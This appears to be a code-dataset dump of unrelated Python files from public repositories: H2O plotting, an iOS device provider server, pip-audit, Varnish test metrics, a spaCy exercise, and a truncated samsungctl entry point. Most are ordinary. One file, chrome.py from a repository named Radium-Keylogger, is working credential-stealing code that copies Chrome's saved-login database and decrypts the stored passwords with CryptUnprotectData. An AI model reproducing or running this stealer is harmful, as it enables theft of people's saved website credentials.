max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
acp/__main__.py | 6sibilings/daniel-Allen | 133 | 11194748 | <gh_stars>100-1000
import cli
cli.main()
|
Recoveries/chrome.py | Harot5001/Radium-Keylogger | 498 | 11194752 | <reponame>Harot5001/Radium-Keylogger
import sqlite3
import shutil
import win32crypt
import sys, os, platform
class Chrome():
def __init__(self):
pass
def run(self):
database_path = ''
if 'HOMEDRIVE' in os.environ and 'HOMEPATH' in os.environ:
# For Win7
path_Win7 = os.environ.get('HOMEDRIVE') + os.environ.get(
'HOMEPATH') + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data'
# For XP
path_XP = os.environ.get('HOMEDRIVE') + os.environ.get(
'HOMEPATH') + '\AppData\Local\Google\Chrome\User Data\Default\Login Data'
if os.path.exists(path_XP):
database_path = path_XP
elif os.path.exists(path_Win7):
database_path = path_Win7
else:
return
else:
return
# Copy database before to query it (bypass lock errors)
try:
shutil.copy(database_path, os.getcwd() + os.sep + 'tmp_db')
database_path = os.getcwd() + os.sep + 'tmp_db'
except Exception, e:
pass
# Connect to the Database
try:
conn = sqlite3.connect(database_path)
cursor = conn.cursor()
except Exception, e:
return
# Get the results
try:
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
except:
return
pwdFound = []
for result in cursor.fetchall():
values = {}
try:
# Decrypt the Password
password = <PASSWORD>.CryptUnprotectData(result[2], None, None, None, 0)[1]
except Exception, e:
password = ''
if password:
values['Site'] = result[0]
values['Username'] = result[1]
values['Password'] = password
pwdFound.append(values)
conn.close()
if database_path.endswith('tmp_db'):
os.remove(database_path)
return pwdFound
#tem = Chrome()
#a = tem.run()
#print a |
h2o-py/h2o/model/extensions/varimp.py | MikolajBak/h2o-3 | 6,098 | 11194756 | from h2o.utils.ext_dependencies import get_matplotlib_pyplot
from h2o.utils.typechecks import assert_is_type
class VariableImportance:
def _varimp_plot(self, num_of_features=None, server=False):
"""
Plot the variable importance for a trained model.
:param num_of_features: the number of features shown in the plot (default is 10 or all if less than 10).
:param server: if true set server settings to matplotlib and show the graph
:returns: None.
"""
assert_is_type(num_of_features, None, int)
assert_is_type(server, bool)
plt = get_matplotlib_pyplot(server)
if plt is None:
return
# get the variable importances as a list of tuples, do not use pandas dataframe
importances = self.varimp(use_pandas=False)
# features labels correspond to the first value of each tuple in the importances list
feature_labels = [tup[0] for tup in importances]
# relative importances correspond to the first value of each tuple in the importances list
scaled_importances = [tup[2] for tup in importances]
# specify bar centers on the y axis, but flip the order so largest bar appears at top
pos = range(len(feature_labels))[::-1]
# specify the bar lengths
val = scaled_importances
# default to 10 or less features if num_of_features is not specified
if num_of_features is None:
num_of_features = min(len(val), 10)
fig, ax = plt.subplots(1, 1, figsize=(14, 10))
# create separate plot for the case where num_of_features == 1
if num_of_features == 1:
plt.barh(pos[0:num_of_features], val[0:num_of_features], align="center",
height=0.8, color="#1F77B4", edgecolor="none")
# Hide the right and top spines, color others grey
ax.spines["right"].set_visible(False)
ax.spines["top"].set_visible(False)
ax.spines["bottom"].set_color("#7B7B7B")
ax.spines["left"].set_color("#7B7B7B")
# Only show ticks on the left and bottom spines
ax.yaxis.set_ticks_position("left")
ax.xaxis.set_ticks_position("bottom")
plt.yticks(pos[0:num_of_features], feature_labels[0:num_of_features])
ax.margins(None, 0.5)
else:
plt.barh(pos[0:num_of_features], val[0:num_of_features], align="center",
height=0.8, color="#1F77B4", edgecolor="none")
# Hide the right and top spines, color others grey
ax.spines["right"].set_visible(False)
ax.spines["top"].set_visible(False)
ax.spines["bottom"].set_color("#7B7B7B")
ax.spines["left"].set_color("#7B7B7B")
# Only show ticks on the left and bottom spines
ax.yaxis.set_ticks_position("left")
ax.xaxis.set_ticks_position("bottom")
plt.yticks(pos[0:num_of_features], feature_labels[0:num_of_features])
plt.ylim([min(pos[0:num_of_features])- 1, max(pos[0:num_of_features])+1])
# ax.margins(y=0.5)
# check which algorithm was used to select right plot title
plt.title("Variable Importance: H2O %s" % self._model_json["algo_full_name"], fontsize=20)
if not server:
plt.show()
|
main.py | eyotang/atxserver2-ios-provider | 103 | 11194757 | from __future__ import print_function
import argparse
import os
import shutil
import subprocess
import tempfile
import time
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor
from functools import partial
import requests
import tornado.web
from logzero import logger
from tornado import gen, httpclient, locks
from tornado.concurrent import run_on_executor
from tornado.httpclient import AsyncHTTPClient
from tornado.ioloop import IOLoop
from tornado.log import enable_pretty_logging
import heartbeat
import idb
from utils import current_ip
from typing import Union
idevices = {}
hbc = None
class CorsMixin(object):
CORS_ORIGIN = '*'
CORS_METHODS = 'GET,POST,OPTIONS'
CORS_CREDENTIALS = True
CORS_HEADERS = "x-requested-with,authorization"
def set_default_headers(self):
self.set_header("Access-Control-Allow-Origin", self.CORS_ORIGIN)
self.set_header("Access-Control-Allow-Headers", self.CORS_HEADERS)
self.set_header('Access-Control-Allow-Methods', self.CORS_METHODS)
def options(self):
# no body
self.set_status(204)
self.finish()
class MainHandler(tornado.web.RequestHandler):
@gen.coroutine
def get(self):
yield gen.sleep(.5)
self.write("Hello, world")
class ProxyTesterhomeHandler(tornado.web.RequestHandler):
@gen.coroutine
def get(self):
body = yield self.get_testerhome()
self.write(body)
@gen.coroutine
def get_testerhome(self):
http_client = AsyncHTTPClient()
response = yield http_client.fetch("https://testerhome.com/")
raise gen.Return(response.body)
class ColdingHandler(tornado.web.RequestHandler):
""" reset device to clean state """
async def post(self, udid=None):
udid = udid or self.get_argument('udid', None)
assert udid
d = idevices.get(udid)
try:
if not d:
raise Exception("Device not found")
d.restart_wda_proxy() # change wda public port
wda_url = "http://{}:{}".format(current_ip(), d.public_port)
await d.wda_healthcheck()
await hbc.device_update({
"udid": udid,
"colding": False,
"provider": {
"wdaUrl": wda_url,
}
})
self.write({
"success": True,
"description": "Device successfully colded"
})
except Exception as e:
logger.warning("colding procedure got error: %s", e)
self.set_status(400) # bad request
self.write({
"success": False,
"description": "udid: %s not found" % udid
})
class AppInstallHandler(CorsMixin, tornado.web.RequestHandler):
executor = ThreadPoolExecutor(4)
@run_on_executor(executor='executor')
def app_install(self, udid: str, url: str):
try:
r = requests.get(url, stream=True)
if r.status_code != 200:
return {"success": False, "description": r.reason}
except Exception as e:
return {"success": False, "description": str(e)}
# tempfile.
logger.debug("%s app-install from %s", udid[:7], url)
tfile = tempfile.NamedTemporaryFile(suffix=".ipa",
prefix="tmpfile-",
dir=os.getcwd())
try:
ipa_path = tfile.name
logger.debug("%s temp ipa path: %s", udid[:7], ipa_path)
# try:
# with open(ipa_path, "wb") as tfile:
content_length = int(r.headers.get("content-length", 0))
if content_length:
for chunk in r.iter_content(chunk_size=40960):
tfile.write(chunk)
else:
shutil.copyfileobj(r.raw, tfile)
p = subprocess.Popen(
["ideviceinstaller", "-u", udid, "-i", ipa_path],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
output = ""
for line in p.stdout:
line = line.decode('utf-8')
logger.debug("%s -- %s", udid[:7], line.strip())
output += line
success = "Complete" in output
exit_code = p.wait()
if not success:
return {"success": False, "description": output}
return {
"success": success,
# "bundleId": bundle_id,
"return": exit_code,
"output": output
}
except Exception as e:
return {"success": False, "status": 500, "description": str(e)}
finally:
tfile.close()
@gen.coroutine
def post(self):
udid = self.get_argument("udid")
url = self.get_argument("url")
device = idevices[udid]
ret = yield self.app_install(device.udid, url)
if not ret['success']:
self.set_status(ret.get("status", 400)) # default bad request
self.write(ret)
def make_app(**settings):
settings['template_path'] = 'templates'
settings['static_path'] = 'static'
settings['cookie_secret'] = os.environ.get("SECRET", "SECRET:_")
settings['login_url'] = '/login'
return tornado.web.Application([
(r"/", MainHandler),
(r"/testerhome", ProxyTesterhomeHandler),
(r"/devices/([^/]+)/cold", ColdingHandler),
(r"/devices/([^/]+)/app/install", AppInstallHandler),
(r"/cold", ColdingHandler),
(r"/app/install", AppInstallHandler),
], **settings)
async def _device_callback(d: idb.WDADevice,
status: str,
info: Union[dict, None] = None):
""" monitor device status """
wd = idb.WDADevice
if status == wd.status_preparing:
await hbc.device_update({
"udid": d.udid,
"provider": None, # no provider indicate not present
"colding": False,
"properties": {
"name": d.name,
"product": d.product,
"brand": "Apple",
}
})
elif status == wd.status_ready:
logger.debug("%s %s", d, "healthcheck passed")
assert isinstance(info, dict)
info = defaultdict(dict, info)
await hbc.device_update({
# "colding": False,
"udid": d.udid,
"provider": {
"wdaUrl": "http://{}:{}".format(current_ip(), d.public_port)
},
"properties": {
"ip": info['value']['ios']['ip'],
"version": info['value']['os']['version'],
"sdkVersion": info['value']['os']['sdkVersion'],
}
}) # yapf: disable
elif status == wd.status_fatal:
await hbc.device_update({
"udid": d.udid,
"provider": None,
})
else:
logger.error("Unknown status: %s", status)
async def device_watch(wda_directory: str, manually_start_wda: bool, use_tidevice: bool, wda_bundle_pattern: bool):
"""
When iOS device plugin, launch WDA
"""
lock = locks.Lock() # WDA launch one by one
async for event in idb.track_devices():
if event.udid.startswith("ffffffffffffffffff"):
logger.debug("Invalid event: %s", event)
continue
logger.debug("Event: %s", event)
if event.present:
d = idb.WDADevice(event.udid, lock=lock, callback=_device_callback)
d.wda_directory = wda_directory
d.manually_start_wda = manually_start_wda
d.use_tidevice = use_tidevice
d.wda_bundle_pattern = wda_bundle_pattern
idevices[event.udid] = d
d.start()
else: # offline
await idevices[event.udid].stop()
idevices.pop(event.udid)
async def async_main():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-d',
'--debug',
action="store_true",
help="enable debug mode")
parser.add_argument('-p',
'--port',
type=int,
default=3600,
help='listen port')
parser.add_argument("-s",
"--server",
type=str,
default="localhost:4000",
required=False,
help="server address")
parser.add_argument("-W",
"--wda-directory",
default="./WebDriverAgent",
help="WebDriverAgent source directory")
parser.add_argument("--manually-start-wda",
action="store_true",
help="Start wda manually like using tidevice(with xctest). Then atx won't start WebDriverAgent")
parser.add_argument("--use-tidevice",
action="store_true",
help="Start wda automatically using tidevice command. Only works when not using manually-start-wda")
parser.add_argument("--wda-bundle-pattern",
type=str,
default="*WebDriverAgent*",
required=False,
help="If using --use-tidevice, can override wda bundle name pattern manually")
args = parser.parse_args()
# start server
enable_pretty_logging()
app = make_app(debug=args.debug)
app.listen(args.port)
global hbc
self_url = "http://{}:{}".format(current_ip(), args.port)
server_addr = args.server.replace("http://", "").replace("/", "")
hbc = await heartbeat.heartbeat_connect(server_addr,
platform='apple',
self_url=self_url)
await device_watch(args.wda_directory, args.manually_start_wda, args.use_tidevice, args.wda_bundle_pattern)
if __name__ == "__main__":
try:
IOLoop.current().run_sync(async_main)
# IOLoop.instance().start()
except KeyboardInterrupt:
IOLoop.instance().stop()
for d in idevices.values():
d.destroy()
|
pip_audit/_fix.py | pombredanne/pip-audit | 447 | 11194763 | <reponame>pombredanne/pip-audit<filename>pip_audit/_fix.py
"""
Functionality for resolving fixed versions of dependencies.
"""
import logging
from dataclasses import dataclass
from typing import Dict, Iterator, List, cast
from packaging.version import Version
from pip_audit._service import (
Dependency,
ResolvedDependency,
VulnerabilityResult,
VulnerabilityService,
)
from pip_audit._state import AuditState
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class FixVersion:
"""
Represents an abstract dependency fix version.
This class cannot be constructed directly.
"""
dep: ResolvedDependency
def __init__(self, *_args, **_kwargs) -> None: # pragma: no cover
"""
A stub constructor that always fails.
"""
raise NotImplementedError
def is_skipped(self) -> bool:
"""
Check whether the `FixVersion` was unable to be resolved.
"""
return self.__class__ is SkippedFixVersion
@dataclass(frozen=True)
class ResolvedFixVersion(FixVersion):
"""
Represents a resolved fix version.
"""
version: Version
@dataclass(frozen=True)
class SkippedFixVersion(FixVersion):
"""
Represents a fix version that was unable to be resolved and therefore, skipped.
"""
skip_reason: str
def resolve_fix_versions(
service: VulnerabilityService,
result: Dict[Dependency, List[VulnerabilityResult]],
state: AuditState = AuditState(),
) -> Iterator[FixVersion]:
"""
Resolves a mapping of dependencies to known vulnerabilities to a series of fix versions without
known vulnerabilties.
"""
for (dep, vulns) in result.items():
if dep.is_skipped():
continue
if not vulns:
continue
dep = cast(ResolvedDependency, dep)
try:
version = _resolve_fix_version(service, dep, vulns, state)
yield ResolvedFixVersion(dep, version)
except FixResolutionImpossible as fri:
skip_reason = str(fri)
logger.debug(skip_reason)
yield SkippedFixVersion(dep, skip_reason)
def _resolve_fix_version(
service: VulnerabilityService,
dep: ResolvedDependency,
vulns: List[VulnerabilityResult],
state: AuditState,
) -> Version:
# We need to upgrade to a fix version that satisfies all vulnerability results
#
# However, whenever we upgrade a dependency, we run the risk of introducing new vulnerabilities
# so we need to run this in a loop and continue polling the vulnerability service on each
# prospective resolved fix version
current_version = dep.version
current_vulns = vulns
while current_vulns:
state.update_state(f"Resolving fix version for {dep.name}, checking {current_version}")
def get_earliest_fix_version(d: ResolvedDependency, v: VulnerabilityResult) -> Version:
for fix_version in v.fix_versions:
if fix_version > current_version:
return fix_version
raise FixResolutionImpossible(
f"failed to fix dependency {dep.name} ({dep.version}), unable to find fix version "
f"for vulnerability {v.id}"
)
# We want to retrieve a version that potentially fixes all vulnerabilities
current_version = max([get_earliest_fix_version(dep, v) for v in current_vulns])
_, current_vulns = service.query(ResolvedDependency(dep.name, current_version))
return current_version
class FixResolutionImpossible(Exception):
"""
Raised when `resolve_fix_versions` fails to find a fix version without known vulnerabilities
"""
pass
|
common/__init__.py | apple/ml-cvnets | 209 | 11194764 | <reponame>apple/ml-cvnets<filename>common/__init__.py<gh_stars>100-1000
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2022 Apple Inc. All Rights Reserved.
#
SUPPORTED_IMAGE_EXTNS = [".png", ".jpg", ".jpeg"] # Add image formats here
SUPPORTED_MODALITIES = ["image", "video"]
SUPPORTED_VIDEO_CLIP_VOTING_FN = ["sum", "max"]
SUPPORTED_VIDEO_READER = ["pyav", "decord"]
DEFAULT_IMAGE_WIDTH = DEFAULT_IMAGE_HEIGHT = 256
DEFAULT_IMAGE_CHANNELS = 3
DEFAULT_VIDEO_FRAMES = 8
DEFAULT_LOG_FREQ = 500
DEFAULT_ITERATIONS = 300000
DEFAULT_EPOCHS = 300
DEFAULT_MAX_ITERATIONS = DEFAULT_MAX_EPOCHS = 10000000
TMP_RES_FOLDER = "results_tmp"
TMP_CACHE_LOC = "/tmp"
|
varnish/tests/common.py | mchelen-gov/integrations-core | 663 | 11194771 | # (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import os
# This is a small extract of metrics from varnish. This is meant to test that
# the check gather metrics. This the check return everything from varnish
# without any selection/rename, their is no point in having a complete list.
COMMON_METRICS = [
"varnish.uptime", # metrics where the "MAIN" prefix was removed
"varnish.sess_conn", # metrics where the "MAIN" prefix was removed
"varnish.sess_fail", # metrics where the "MAIN" prefix was removed
"varnish.client_req_400", # metrics where the "MAIN" prefix was removed
"varnish.client_req_417", # metrics where the "MAIN" prefix was removed
"varnish.client_req", # metrics where the "MAIN" prefix was removed
"varnish.cache_hit", # metrics where the "MAIN" prefix was removed
"varnish.cache_hitpass", # metrics where the "MAIN" prefix was removed
"varnish.cache_miss", # metrics where the "MAIN" prefix was removed
"varnish.backend_conn", # metrics where the "MAIN" prefix was removed
"varnish.backend_unhealthy", # metrics where the "MAIN" prefix was removed
"varnish.backend_busy", # metrics where the "MAIN" prefix was removed
"varnish.fetch_eof", # metrics where the "MAIN" prefix was removed
"varnish.fetch_bad", # metrics where the "MAIN" prefix was removed
"varnish.fetch_none", # metrics where the "MAIN" prefix was removed
"varnish.fetch_1xx", # metrics where the "MAIN" prefix was removed
"varnish.pools", # metrics where the "MAIN" prefix was removed
"varnish.busy_sleep", # metrics where the "MAIN" prefix was removed
"varnish.busy_wakeup", # metrics where the "MAIN" prefix was removed
"varnish.busy_killed", # metrics where the "MAIN" prefix was removed
"varnish.sess_queued", # metrics where the "MAIN" prefix was removed
"varnish.sess_dropped", # metrics where the "MAIN" prefix was removed
"varnish.n_object", # metrics where the "MAIN" prefix was removed
"varnish.n_vampireobject", # metrics where the "MAIN" prefix was removed
"varnish.n_vcl", # metrics where the "MAIN" prefix was removed
"varnish.n_vcl_avail", # metrics where the "MAIN" prefix was removed
"varnish.n_vcl_discard", # metrics where the "MAIN" prefix was removed
"varnish.bans", # metrics where the "MAIN" prefix was removed
"varnish.bans_completed", # metrics where the "MAIN" prefix was removed
"varnish.bans_obj", # metrics where the "MAIN" prefix was removed
"varnish.bans_req", # metrics where the "MAIN" prefix was removed
"varnish.MGT.child_start",
"varnish.MGT.child_exit",
"varnish.MGT.child_stop",
"varnish.MEMPOOL.busyobj.live",
"varnish.MEMPOOL.busyobj.pool",
"varnish.MEMPOOL.busyobj.allocs",
"varnish.MEMPOOL.busyobj.frees",
"varnish.SMA.s0.c_req",
"varnish.SMA.s0.c_fail",
"varnish.SMA.Transient.c_req",
"varnish.SMA.Transient.c_fail",
"varnish.VBE.boot.default.req",
"varnish.LCK.backend.creat",
"varnish.LCK.ban.creat",
"varnish.LCK.ban.locks",
"varnish.LCK.busyobj.creat",
"varnish.LCK.mempool.creat",
"varnish.LCK.vbe.creat",
"varnish.LCK.vbe.destroy",
"varnish.LCK.vcl.creat",
"varnish.LCK.vcl.destroy",
"varnish.LCK.vcl.locks",
"varnish.n_purges",
"varnish.LCK.backend.destroy",
"varnish.LCK.backend.locks",
"varnish.LCK.ban.destroy",
"varnish.LCK.busyobj.destroy",
"varnish.LCK.busyobj.locks",
"varnish.LCK.cli.creat",
"varnish.LCK.cli.destroy",
"varnish.LCK.cli.locks",
"varnish.LCK.exp.creat",
"varnish.LCK.exp.destroy",
"varnish.LCK.exp.locks",
"varnish.LCK.hcb.creat",
"varnish.LCK.hcb.destroy",
"varnish.LCK.hcb.locks",
"varnish.LCK.lru.creat",
"varnish.LCK.lru.destroy",
"varnish.LCK.lru.locks",
"varnish.LCK.mempool.destroy",
"varnish.LCK.mempool.locks",
"varnish.LCK.objhdr.creat",
"varnish.LCK.objhdr.destroy",
"varnish.LCK.objhdr.locks",
"varnish.LCK.pipestat.creat",
"varnish.LCK.pipestat.destroy",
"varnish.LCK.pipestat.locks",
"varnish.LCK.sess.creat",
"varnish.LCK.sess.destroy",
"varnish.LCK.sess.locks",
"varnish.LCK.sma.creat",
"varnish.LCK.sma.destroy",
"varnish.LCK.sma.locks",
"varnish.LCK.vbe.locks",
"varnish.LCK.vcapace.creat",
"varnish.LCK.vcapace.destroy",
"varnish.LCK.vcapace.locks",
"varnish.LCK.vxid.creat",
"varnish.LCK.vxid.destroy",
"varnish.LCK.vxid.locks",
"varnish.LCK.waiter.creat",
"varnish.LCK.waiter.destroy",
"varnish.LCK.waiter.locks",
"varnish.LCK.wq.creat",
"varnish.LCK.wq.destroy",
"varnish.LCK.wq.locks",
"varnish.LCK.wstat.creat",
"varnish.LCK.wstat.destroy",
"varnish.LCK.wstat.locks",
"varnish.MEMPOOL.busyobj.randry",
"varnish.MEMPOOL.busyobj.recycle",
"varnish.MEMPOOL.busyobj.surplus",
"varnish.MEMPOOL.busyobj.sz_actual",
"varnish.MEMPOOL.busyobj.sz_wanted",
"varnish.MEMPOOL.busyobj.timeout",
"varnish.MEMPOOL.busyobj.toosmall",
"varnish.MEMPOOL.req0.allocs",
"varnish.MEMPOOL.req0.frees",
"varnish.MEMPOOL.req0.live",
"varnish.MEMPOOL.req0.pool",
"varnish.MEMPOOL.req0.randry",
"varnish.MEMPOOL.req0.recycle",
"varnish.MEMPOOL.req0.surplus",
"varnish.MEMPOOL.req0.sz_actual",
"varnish.MEMPOOL.req0.sz_wanted",
"varnish.MEMPOOL.req0.timeout",
"varnish.MEMPOOL.req0.toosmall",
"varnish.MEMPOOL.req1.allocs",
"varnish.MEMPOOL.req1.frees",
"varnish.MEMPOOL.req1.live",
"varnish.MEMPOOL.req1.pool",
"varnish.MEMPOOL.req1.randry",
"varnish.MEMPOOL.req1.recycle",
"varnish.MEMPOOL.req1.surplus",
"varnish.MEMPOOL.req1.sz_actual",
"varnish.MEMPOOL.req1.sz_wanted",
"varnish.MEMPOOL.req1.timeout",
"varnish.MEMPOOL.req1.toosmall",
"varnish.MEMPOOL.sess0.allocs",
"varnish.MEMPOOL.sess0.frees",
"varnish.MEMPOOL.sess0.live",
"varnish.MEMPOOL.sess0.pool",
"varnish.MEMPOOL.sess0.randry",
"varnish.MEMPOOL.sess0.recycle",
"varnish.MEMPOOL.sess0.surplus",
"varnish.MEMPOOL.sess0.sz_actual",
"varnish.MEMPOOL.sess0.sz_wanted",
"varnish.MEMPOOL.sess0.timeout",
"varnish.MEMPOOL.sess0.toosmall",
"varnish.MEMPOOL.sess1.allocs",
"varnish.MEMPOOL.sess1.frees",
"varnish.MEMPOOL.sess1.live",
"varnish.MEMPOOL.sess1.pool",
"varnish.MEMPOOL.sess1.randry",
"varnish.MEMPOOL.sess1.recycle",
"varnish.MEMPOOL.sess1.surplus",
"varnish.MEMPOOL.sess1.sz_actual",
"varnish.MEMPOOL.sess1.sz_wanted",
"varnish.MEMPOOL.sess1.timeout",
"varnish.MEMPOOL.sess1.toosmall",
"varnish.MGT.child_died",
"varnish.MGT.child_dump",
"varnish.MGT.child_panic",
"varnish.MGT.uptime",
"varnish.SMA.Transient.c_bytes",
"varnish.SMA.Transient.c_freed",
"varnish.SMA.Transient.g_alloc",
"varnish.SMA.Transient.g_bytes",
"varnish.SMA.Transient.g_space",
"varnish.SMA.s0.c_bytes",
"varnish.SMA.s0.c_freed",
"varnish.SMA.s0.g_alloc",
"varnish.SMA.s0.g_bytes",
"varnish.SMA.s0.g_space",
"varnish.backend_fail",
"varnish.backend_recycle",
"varnish.backend_req",
"varnish.backend_retry",
"varnish.backend_reuse",
"varnish.bans_added",
"varnish.bans_deleted",
"varnish.bans_dups",
"varnish.bans_lurker_contention",
"varnish.bans_lurker_obj_killed",
"varnish.bans_lurker_obj_killed_cutoff",
"varnish.bans_lurker_tested",
"varnish.bans_lurker_tests_tested",
"varnish.bans_obj_killed",
"varnish.bans_persisted_bytes",
"varnish.bans_persisted_fragmentation",
"varnish.bans_tested",
"varnish.bans_tests_tested",
"varnish.cache_hitmiss",
"varnish.esi_errors",
"varnish.esi_warnings",
"varnish.exp_mailed",
"varnish.exp_received",
"varnish.fetch_204",
"varnish.fetch_304",
"varnish.fetch_chunked",
"varnish.fetch_failed",
"varnish.fetch_head",
"varnish.fetch_length",
"varnish.fetch_no_thread",
"varnish.hcb_insert",
"varnish.hcb_lock",
"varnish.hcb_nolock",
"varnish.losthdr",
"varnish.n_backend",
"varnish.n_expired",
"varnish.n_gunzip",
"varnish.n_gzip",
"varnish.n_lru_moved",
"varnish.n_lru_nuked",
"varnish.n_obj_purged",
"varnish.n_objectcore",
"varnish.n_objecthead",
"varnish.n_test_gunzip",
"varnish.req_dropped",
"varnish.s_fetch",
"varnish.s_pass",
"varnish.s_pipe",
"varnish.s_pipe_hdrbytes",
"varnish.s_pipe_in",
"varnish.s_pipe_out",
"varnish.s_req_bodybytes",
"varnish.s_req_hdrbytes",
"varnish.s_resp_bodybytes",
"varnish.s_resp_hdrbytes",
"varnish.s_sess",
"varnish.s_synth",
"varnish.sc_overload",
"varnish.sc_pipe_overflow",
"varnish.sc_range_short",
"varnish.sc_rem_close",
"varnish.sc_req_close",
"varnish.sc_req_http10",
"varnish.sc_req_http20",
"varnish.sc_resp_close",
"varnish.sc_rx_bad",
"varnish.sc_rx_body",
"varnish.sc_rx_junk",
"varnish.sc_rx_overflow",
"varnish.sc_rx_timeout",
"varnish.sc_tx_eof",
"varnish.sc_tx_error",
"varnish.sc_tx_pipe",
"varnish.sc_vcl_failure",
"varnish.sess_closed",
"varnish.sess_closed_err",
"varnish.sess_herd",
"varnish.sess_readahead",
"varnish.shm_cont",
"varnish.shm_cycles",
"varnish.shm_flushes",
"varnish.shm_records",
"varnish.shm_writes",
"varnish.summs",
"varnish.thread_queue_len",
"varnish.threads",
"varnish.threads_created",
"varnish.threads_destroyed",
"varnish.threads_failed",
"varnish.threads_limited",
"varnish.vcl_fail",
"varnish.vmods",
"varnish.VBE.boot.default.bereq_bodybytes",
"varnish.VBE.boot.default.bereq_hdrbytes",
"varnish.VBE.boot.default.beresp_bodybytes",
"varnish.VBE.boot.default.beresp_hdrbytes",
"varnish.VBE.boot.default.conn",
"varnish.VBE.boot.default.pipe_hdrbytes",
"varnish.VBE.boot.default.pipe_in",
"varnish.VBE.boot.default.pipe_out",
]
METRICS_5 = [
"varnish.sess_drop", # metrics where the "MAIN" prefix was removed
"varnish.LCK.backend_tcp.creat",
"varnish.LCK.backend_tcp.destroy",
"varnish.LCK.backend_tcp.locks",
# This is a rate that is artificially emitted with the same value as varnish.n_purges
# which is a gauge in versions <=5
"varnish.n_purgesps",
]
METRICS_6 = [
"varnish.LCK.backend.dbg_busy",
"varnish.LCK.tcp_pool.creat",
"varnish.LCK.tcp_pool.destroy",
"varnish.LCK.tcp_pool.locks",
"varnish.LCK.ban.dbg_busy",
"varnish.LCK.ban.dbg_try_fail",
"varnish.LCK.backend.dbg_try_fail",
"varnish.LCK.busyobj.dbg_busy",
"varnish.LCK.busyobj.dbg_try_fail",
"varnish.LCK.cli.dbg_busy",
"varnish.LCK.cli.dbg_try_fail",
"varnish.LCK.exp.dbg_busy",
"varnish.LCK.exp.dbg_try_fail",
"varnish.LCK.hcb.dbg_busy",
"varnish.LCK.hcb.dbg_try_fail",
"varnish.LCK.lru.dbg_busy",
"varnish.LCK.lru.dbg_try_fail",
"varnish.LCK.mempool.dbg_busy",
"varnish.LCK.mempool.dbg_try_fail",
"varnish.LCK.objhdr.dbg_busy",
"varnish.LCK.objhdr.dbg_try_fail",
"varnish.LCK.perpool.destroy",
"varnish.LCK.perpool.locks",
"varnish.LCK.perpool.creat",
"varnish.LCK.perpool.dbg_busy",
"varnish.LCK.perpool.dbg_try_fail",
"varnish.LCK.pipestat.dbg_busy",
"varnish.LCK.pipestat.dbg_try_fail",
"varnish.LCK.probe.creat",
"varnish.LCK.probe.destroy",
"varnish.LCK.probe.locks",
"varnish.LCK.probe.dbg_busy",
"varnish.LCK.probe.dbg_try_fail",
"varnish.LCK.sess.dbg_busy",
"varnish.LCK.sess.dbg_try_fail",
"varnish.LCK.sma.dbg_busy",
"varnish.LCK.sma.dbg_try_fail",
"varnish.LCK.tcp_pool.dbg_busy",
"varnish.LCK.tcp_pool.dbg_try_fail",
"varnish.LCK.vcapace.dbg_busy",
"varnish.LCK.vcapace.dbg_try_fail",
"varnish.LCK.vbe.dbg_busy",
"varnish.LCK.vbe.dbg_try_fail",
"varnish.LCK.vcl.dbg_busy",
"varnish.LCK.vcl.dbg_try_fail",
"varnish.LCK.vxid.dbg_busy",
"varnish.LCK.vxid.dbg_try_fail",
"varnish.LCK.waiter.dbg_busy",
"varnish.LCK.waiter.dbg_try_fail",
"varnish.LCK.wq.dbg_busy",
"varnish.LCK.wq.dbg_try_fail",
"varnish.LCK.wstat.dbg_busy",
"varnish.LCK.wstat.dbg_try_fail",
"varnish.VBE.boot.default.busy",
"varnish.VBE.boot.default.fail",
"varnish.VBE.boot.default.fail_eacces",
"varnish.VBE.boot.default.fail_eaddrnotavail",
"varnish.VBE.boot.default.fail_econnrefused",
"varnish.VBE.boot.default.fail_enetunreach",
"varnish.VBE.boot.default.fail_etimedout",
"varnish.VBE.boot.default.fail_other",
"varnish.VBE.boot.default.helddown",
"varnish.VBE.boot.default.unhealthy",
"varnish.beresp_shortlived",
"varnish.beresp_uncacheable",
"varnish.cache_hit_grace",
"varnish.client_resp_500",
"varnish.n_lru_limited",
"varnish.n_pipe",
"varnish.pipe_limited",
"varnish.sc_rx_close_idle",
"varnish.sess_fail_ebadf",
"varnish.sess_fail_econnaborted",
"varnish.sess_fail_eintr",
"varnish.sess_fail_emfile",
"varnish.sess_fail_enomem",
"varnish.sess_fail_other",
"varnish.ws_backend_overflow",
"varnish.ws_client_overflow",
"varnish.ws_session_overflow",
"varnish.ws_thread_overflow",
]
VARNISHADM_PATH = "varnishadm"
SECRETFILE_PATH = "secretfile"
DAEMON_ADDRESS = "localhost:6082"
HERE = os.path.join(os.path.dirname(__file__))
FIXTURE_DIR = os.path.join(HERE, "fixtures")
CHECK_NAME = "varnish"
VARNISH_VERSION = os.getenv('VARNISH_VERSION')
def get_config_by_version(name=None):
config = {"varnishstat": get_varnish_stat_path(), "tags": ["varnish_cluster:webs"]}
if name:
config["name"] = name
return config
def get_varnish_stat_path():
return "docker exec ci_varnish varnishstat"
|
exercises/en/solution_02_06.py | Jette16/spacy-course | 2,085 | 11194785 | <filename>exercises/en/solution_02_06.py
from spacy.lang.en import English
nlp = English()
# Import the Doc and Span classes
from spacy.tokens import Doc, Span
words = ["I", "like", "David", "Bowie"]
spaces = [True, True, True, False]
# Create a doc from the words and spaces
doc = Doc(nlp.vocab, words=words, spaces=spaces)
print(doc.text)
# Create a span for "<NAME>" from the doc and assign it the label "PERSON"
span = Span(doc, 2, 4, label="PERSON")
print(span.text, span.label_)
# Add the span to the doc's entities
doc.ents = [span]
# Print entities' text and labels
print([(ent.text, ent.label_) for ent in doc.ents])
|
samsungctl/__main__.py | p3g4asus/samsungctl | 135 | 11194793 | # -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import collections
import json
import logging
import os
import socket
import sys
try:
from . import __doc__ as doc
from . import __title__ as title
from . import __version__ as version
from . import exceptions
from . import Remote
from . import key_mappings
from .config import Config
except ValueError:
path = os.path.dirname(__file__)
if not path:
